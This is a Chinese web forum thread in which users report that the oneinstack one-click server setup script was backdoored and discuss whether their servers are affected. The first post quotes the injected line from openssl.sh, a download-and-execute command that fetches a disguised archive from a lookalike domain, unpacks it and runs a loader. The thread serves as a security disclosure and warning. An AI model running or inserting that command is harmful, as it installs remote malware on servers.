Yoo趣儿

Yoo趣儿 后端服务 服务器 oneinstack一键网站环境脚本最近被挂马了! ...

oneinstack一键网站环境脚本最近被挂马了!

查看 494|回复 7
作者:SK_   
[url]https://github.com/oneinstack/oneinstack/issues/487[/url]
挂马的文件在:/root/oneinstack/include/openssl.sh  137行,多了一段:[ol]wget http://download.cnoneinstack.com/oneinstack.jpg -cO /var/local/oneinstack.jpg && tar zxf /var/local/oneinstack.jpg -C /var/local/ && cd /var/local/cron && ./load [email protected][/ol]复制代码执行代码
github上 https://github.com/oneinstack/oneinstack/blob/main/include/openssl.sh 这个文件是没有这段代码的。
比对oneinstack-full.tar.gz的MD5码是不准的。要看/root/oneinstack/include/openssl.sh 这个文件,不知道黑客会不会留后门清理入侵痕迹,我另外一台几个月前搭建的这个文件没有这串代码。

代码, 文件, 几个

相关帖子

5ean   
看了一下,是真的,我去,我的服务器用的都是oneinstack,检查了一下没有这句
应该是刚被挂上马
klocal   
说好的 不用面板 最安全呢?
5ean   

klocal 发表于 2023-5-1 01:32
说好的 不用面板 最安全呢?
谁能想到源码被黑,挂上马呢,以后不敢用oneinstack了
七夏浅笑   
感觉用啥都有不安全的时候,不过还是用大佬都用的东西好,出问题了能及时被人发现
Xhvai110   
泰裤辣
燕十三丶   
一直用lnmp        
5ean   

燕十三丶 发表于 2023-5-1 01:41
一直用lnmp
还军哥靠谱,稳这么多年了
返回列表
您需要登录后才可以回帖 登录 | 立即注册

AD1

热门主题

热门板块

问与答分享发现分享创造奇思妙想分享邀请码商业推广优惠信息PythonPHPJavaJavaScriptNode.jsGo语言C++HTML

公告

标签|小黑屋|Yoo趣儿

GMT+8, 2024-11-13 08:31 , Processed in 0.019113 second(s), 13 queries , Gzip On, MemCached On.

Powered by Discuz! X3.2

The happiest thing in the world is to strive for an ideal.

返回顶部